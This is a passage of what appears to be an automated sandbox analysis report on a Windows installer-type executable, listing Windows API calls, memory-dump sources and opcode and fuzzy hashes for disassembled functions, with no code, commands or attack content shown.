                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp
                                                  • API String ID: 1356686001-3085278003
                                                  • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                  • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                  • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                  • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID:
                                                  • API String ID: 2979337801-0
                                                  • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                  • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                  • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                  • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                  • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                  • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                  • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                  • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                  • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                  • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                  • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                  • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                  • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                  • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00405999
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 004059A3
                                                  • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405993
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 2659869361-2382934351
                                                  • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                  • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                  • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                  • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                  • String ID:
                                                  • API String ID: 1404258612-0
                                                  • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                  • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                  • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                  • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                  APIs
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                    • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                    • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3585118688-0
                                                  • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                  • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                  • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                  • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405195
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                    • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                  • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                  • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                  • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                  • CloseHandle.KERNEL32(?), ref: 004056F5
                                                  Strings
                                                  • Error launching installer, xrefs: 004056D6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                  • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                  • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                  • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,00403861,771B3420,0040366C,?), ref: 004038A4
                                                  • GlobalFree.KERNEL32(?), ref: 004038AB
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040389C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 1100898210-2382934351
                                                  • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                  • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                  • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                  • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 004059E5
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 004059F5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3976562730
                                                  • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                  • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                  • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                  • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                  • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                  • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                  • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                  • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                  • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                  • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
